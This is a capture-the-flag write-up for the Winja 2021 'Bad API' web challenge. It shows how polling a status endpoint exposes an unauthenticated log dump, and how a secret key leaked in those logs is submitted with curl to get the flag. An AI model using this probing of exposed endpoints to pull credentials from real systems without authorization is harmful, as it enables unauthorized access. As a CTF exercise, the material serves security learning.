Open in app

Sign in

Write

Sign in

Winja 2021 — Bad API — writeup

Vinicius Fiorentino
2 min readMar 7, 2021

--

The challenge is a web page, with a username field.

http://hkqe8p4e8msopmz9ukjd.winjasmartcity.xyz

After trying with “admin”, we receive the message:

“Secret key provided is invalid. Please try again.”

Checking the Network tab on Chrome DevTools, it’s:

POST https://hkqe8p4e8msopmz9ukjd.winjasmartcity.xyz/form

username: admin
secret_key:
Mechanic: Somebody set up us the bomb. Operator: Main screen turn on.

So lets find this secret key, checking the console we can see that there is a recurring call to the endpoint

curl -X GET http://hkqe8p4e8msopmz9ukjd.winjasmartcity.xyz/api/v1/dump_status

The response to this request is:

“Log dump not ready”

after a few seconds it returned the message:

“Dump ready at endpoint (v1)”

So now we will try to find this dump, analyzing the status url we will try to do a get at the endpoint

curl -X GET http://hkqe8p4e8msopmz9ukjd.winjasmartcity.xyz/api/v1/dump

Analysing the response we can see some interesting information leaked:


views.py:44 — process_form()] ImmutableMultiDict([(‘username’, ‘SECRET’), (‘secret_key’, ‘S’)])
[views.py:56 — process_form()] Expected key ALLYOURBASEAREBELONGTOUS not recieved. Redirecting to 404…
[views.py:43 — process_form()] Request recieved:
[views.py:44 — process_form()] ImmutableMultiDict([(‘username’, ‘’), (‘secret_key’, ‘SECRET’)])
[views.py:43 — process_form()] Request recieved:
[views.py:44 — process_form()] ImmutableMultiDict([(‘username’, ‘admin’), (‘secret_key’, ‘\r\nMechanic: Somebody set up us the bomb. Operator: Main screen turn on.\r\n ‘)])
[views.py:56 — process_form()] Expected key (censored) not recieved. Redirecting to 404…

As we can see there are some logs related to secret_key and some secret tips that we can try to use, like ALLYOURBASEAREBELONGTOUS

curl -X POST -F “username=admin” -F “secret_key=ALLYOURBASEAREBELONGTOUS” http://hkqe8p4e8msopmz9ukjd.winjasmartcity.xyz/form

We got a redirect, so it’s a wrong secret_key, but we have another secret_key on the first log, (censored)

curl -X POST -F “username=admin” -F “secret_key=(censored)” http://hkqe8p4e8msopmz9ukjd.winjasmartcity.xyz/form

Now we got an HTML response, with the flag!!


</form>
flag\{(censored)\}
</div>

Keep Hacking!

#KapiSec

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Hacking
Ctf Writeup
API
Security
Web

--

--

Vinicius Fiorentino
Vinicius Fiorentino

Written by Vinicius Fiorentino

0 Followers
1 Following

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams